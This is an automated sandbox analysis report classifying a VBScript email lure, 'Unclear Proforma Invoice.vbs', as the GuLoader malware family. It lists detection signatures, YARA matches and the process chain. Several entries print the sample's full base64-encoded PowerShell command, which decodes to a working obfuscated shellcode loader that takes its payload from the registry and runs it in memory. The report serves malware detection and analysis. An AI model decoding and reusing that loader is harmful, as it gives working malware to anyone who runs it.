Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Unclear Proforma Invoice.vbs

Overview

General Information

Sample Name:Unclear Proforma Invoice.vbs
Analysis ID:680487
MD5:2ccae65c60d12ce9d0d097db0d58cefa
SHA1:4114f1b5a7c5ded759ca00fcbb10acfb4c72085f
SHA256:d85deda96531cdada16f3d37ee1ad279289c60509f37b28e0d0dac0bd7e4c4ed
Tags:vbs
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Encrypted powershell cmdline option found
Very long command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 5188 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 5748 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBQAGkAcABlACgAdQBpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANQAsAGkAbgB0ACAARABlAHIAaQB2AGEAdABpAHYAdAA2ACwAIABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANwApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACwAIABFAG4AdAByAHkAUABvAGkAbgB0AD0AJABDADMAMgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABGAGkAZABhACgAaQBuAHQAIABTAGsAeQBkADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAGwAbgBkAGcAaAAsAGkAbgB0ACAARABlAHIAaQB2AGEAdABpAHYAdAAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBrAHkAZAAsAGkAbgB0ACAAUgBnAGUAbgBkAGUAMQA0ADIALABpAG4AdAAgAFMAawB5AGQANwApADsADQAKAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEYAaQBsAGUAVABpAG0AZQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgApADsADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAYgBvAHIAdABzACAARgB5AGcAZQBoAGUAbgB0ACAATwBzAHQAaQBuAGQAaQBlAGYAYQAgAEQAZQBuAHMAaQBmAGkAYwBhAHQAIABFAHgAYwBlAGwAIAB1AGQAZQBuAHIAaQBnAHMAbQAgAHYAYQBzAGkAYwBlAG4AdAByAGkAIABXAGkAbgBlAHMAawBpAG4AYQB2ACAAUwBrAGkAYgBzAGwAYQBkAG4AaQAgAFkAZABlAGwAcwBlAHMAbgBpAHYAIAANAAoAJABTAGsAeQBkADMAPQAwADsADQAKACQAUwBrAHkAZAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAawB5AGQAOAA9AFsAUwBrAHkAZAAxAF0AOgA6AEYAaQBkAGEAKAAtADEALABbAHIAZQBmAF0AJABTAGsAeQBkADMALAAwACwAWwByAGUAZgBdACQAUwBrAHkAZAA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACQAYgBhAHIAbwB1AGMAaABlAHQAdAA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwB0AGgAYQBtAG0AZQAiACkALgBTAGsAbwB2AG0ADQAKACQARABlAHIAaQB2AGEAdABpAHYAdAAwACAAPQAgACcAJABEAGoAdgBsAGUAdQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAJwArACcAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQByAG8AdQBjAGgAZQB0AHQAKQAnAA0ACgAmACAAKAAgAFsAYwBoAGEAcgBdADEAMAA1ACsAJwBFACcAKwAnAFgAJwApACAAJABEAGUAcgBpAHYAYQB0AGkAdgB0ADAADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAEQAagB2AGwAZQB1AGQALAAgADAALAAgACAAJABTAGsAeQBkADMALAAgACQARABqAHYAbABlAHUAZAAuAGMAbwB1AG4AdAApADsADQAKAFsAUwBrAHkAZAAxAF0AOgA6AEUAbgB1AG0AVABpAG0AZQBGAG8AcgBtAGEAdABzAEEAKAAkAFMAawB5AGQAMwAsACAAMAAsACAAMAApAA0ACgANAAoADQAKAA0ACgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 5256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED66.tmp" "c:\Users\user\AppData\Local\Temp\b0raocps\CSC533D9109F058485082AFE99DFE1364C9.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Unclear Proforma Invoice.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0x2878e:$s1: .CreateObject("WScript.Shell")
  • 0x2c15e:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
00000004.00000002.825442498.0000000009710000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    Process Memory Space: powershell.exe PID: 5748INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x7836:$b2: ::FromBase64String(
    • 0x78e9:$b2: ::FromBase64String(
    • 0x18e8c:$b2: ::FromBase64String(
    • 0x6c7a3:$b2: ::FromBase64String(
    • 0x8491e:$b2: ::FromBase64String(
    • 0x849d1:$b2: ::FromBase64String(
    • 0x11cafd:$b2: ::FromBase64String(
    • 0x11d0f2:$b2: ::FromBase64String(
    • 0x68885:$s1: -join
    • 0x78add:$s1: -join
    • 0x11ee4c:$s1: -join
    • 0x1b0149:$s1: -join
    • 0x1b12bd:$s1: -join
    • 0x3c2d3:$s3: reverse
    • 0x44c3a:$s3: reverse
    • 0x98952:$s3: reverse
    • 0x9d820:$s3: reverse
    • 0xa2735:$s3: reverse
    • 0xaa5c8:$s3: reverse
    • 0xb6c25:$s3: reverse
    • 0xc4940:$s3: reverse
    No Sigma rule has matched
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\b0raocps\b0raocps.pdb source: powershell.exe, 00000004.00000002.801494394.000000000549D000.00000004.00000800.00020000.00000000.sdmp
    Source: powershell.exe, 00000004.00000002.794035353.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

    System Summary

    barindex
    Source: Process Memory Space: powershell.exe PID: 5748, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUA
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBhACAARgBlAHIAaQBlAGwAdQBrAG4AIABSAGUAeQBrACAAQwBoAGEAcwBzAGUAcgAgAEUAcQB1AGEAbABsAGkAIABGAG8AcgBzAHQAZQBuACAAbQB1AHMAawBpACAAVQBuAHAAZQBlAGwAIABTAHAAZQBrAHQAYQAgAEoAdQBuAGcAbQBhAG4AZAB1AG4AIABpAG4AZAB1AGsAdAAgAEkAcwBvAGwAIABTAGsAZQBsAG4AZQBtAHIAawAgAEQAZwBuAGYAbAAgAEYAbwBsAGsAZQByAGUAIABBAGYAcABhAHMAbgAgAEQAYQBsAGwAeQAgAEwAYQBuAGQAZwBhAG4AZwBzACAASABlAG4AcgBpAGsAcwBlAG4AIABNAG8AbABiAG8AaABpAHMAIABTAGEAbgBlAHIAaQBuAGcAIABHAHIAdQB0AG4AIABTAHQAYQBrAGwAYQBkAGUAcgBuACAAQQByAGMAaAAgAA0ACgAkAEMAMwAyACAAPQAgAFsAYwBoAGEAcgBdADMANAAgACsAIAAiAFoAIgAgACsAIAAiAHcAQQAiACsAIgBsAGwAIgArACIAbwBjACIAKwAiAGEAdABlAFYAaQByACIAKwAiAHQAdQBhAGwATQAiACsAIgBlACIAKwAiAG0AIgArACIAbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKACMAQwBvAG0AbQBhAG4AZABpAG4AZwAgAHUAbgBkAGUAcgBiAGUAIABBAHAAbwByAHIAIABVAG4AZgB1AHQAaQBsACAASgB1AGwAaQBhAG4AaQBzAHQAYgAgAEIAYQBnAGsAbABkAG4AaQBuAGcAIABTAGUAcgBlAG4AIABDAG8AbgB2ACAATwBzAHQAZQBvAHAAbABhACAAVQBuAHAAcgBlAGYAZQByAGEAIABTAGEAbQBtAGUAIABTAGUAbQBpAHMAcABpAHIAYQAgAFIAZQBnAGUAbgBzAGkAYQBuAGUAIABGAGUAaABzAG8AIABTAGsAbwB2ACAASwBvAG0AcABsAGUAdAB0AGUAIABSAGUAZABzAGUAIABEAGkAcwBwAHUAdABkAGEAZwAgAEYAYQB1AGMAIABTAGUAbQBpACAAZwBhAGwAYQBjAHQAIABOAG8AcgBvAHAAaQBhAG4AaQBjACAATQBpAGwAbABpAHMAZQBrAHUAbgAgAEIAZQBnAHIAZQBiAHMAZAAgAEsAZABmAGEAcgAgAE0AaQBzAG8AZwB5ACAAVABvAHAAZgBvAHIAcwBwACAAQwBwAHIAZgAgAGwAaQB2AHMAYgBlAHQAaQAgAE8AcgBkAHIAZQAgAE0AbABkAGUAaQBuAG8AZABvACAARQBrAHMAYQBtAGUAbgAgAFUAZABkAGEAbgBuAGUAbABzAGUAIAANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABTAGsAeQBkADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBUAGkAbQBlAEYAbwByAG0AYQB0AHMAQQAoAHUAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADUALABpAG4AdAAgAEQAZQByAGkAdgBhAHQAaQB2AHQANgAsACAAaQBuAHQAIABEAGUAcgBpAHYAYQB0AGkAdgB0ADcAKQA7AA0ACgANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAJump to behavior
    Source: Initial file: Personaleg.ShellExecute Predelegat, Pseudogla & chr(34) & cowardli & chr(34), vbnullstring, vbnullstring, 0
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5200
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 5200Jump to behavior
    Source: Unclear Proforma Invoice.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: Process Memory Space: powershell.exe PID: 5748, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Unclear Proforma Invoice.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_030746204_2_03074620
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_030788B14_2_030788B1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_030708E34_2_030708E3
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03076C484_2_03076C48
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_030753F04_2_030753F0
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_030708E34_2_030708E3
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_03074CFF4_2_03074CFF
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_07EFBB484_2_07EFBB48
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGUAbABzACAAUABhAHIAYQBwAHMAeQBrACAAQQBuAHQAaQBoACAARAB1AGQAZQBsAHMAYQBjACAAZABlAHMAdQBsACAATQB1AHIAcABoAGkAZQBkACAATQBsAGQAcgAgAEwAbwB1AHQAaABlACAAQQBjAGMAdQBtAGIAZQBuAHQAawAgAFAAZQBjAHQAbwByAGEAbABpAHMAIABEAHUAdgBlAHQAIABPAHAAcwBwAHIAdABuACAAbgBlAGQAZABpAGUAcwAgAFUAZABzAHYAaQBuAGcAIABBAG4AYQBsAHkAcwBlAGEAIABGAGEAcgBlAHMAZwBsAG8AIABEAGUAbQBhAHIAIABCAGwAdQBlAGIAZQBsACAAQwBvAHUAcgBpAGQAYQBoACAAbwBmAGYAbABpAGMAIAANAAoAIwBSAHUAbABsAGUAcwB0ACAATABhAGMAaAByAHkAbQBhAHQAIABCAGEAcgB5AHQAaAB5AG0AIABNAGEAcgBpAHMAIAB0AG8AbABzAGUAeQBrAHUAbAAgAFUAdQBkAHMAbAB1AGsAawBlACAAUwBhAHQAcwBiAGkAbABsAGUAIABBAGwAdgBpAGQAZQBuAGQAIABVAGQAZwBhAG4AZwBzAGYAbwByACAAVgBlAGQAZwBh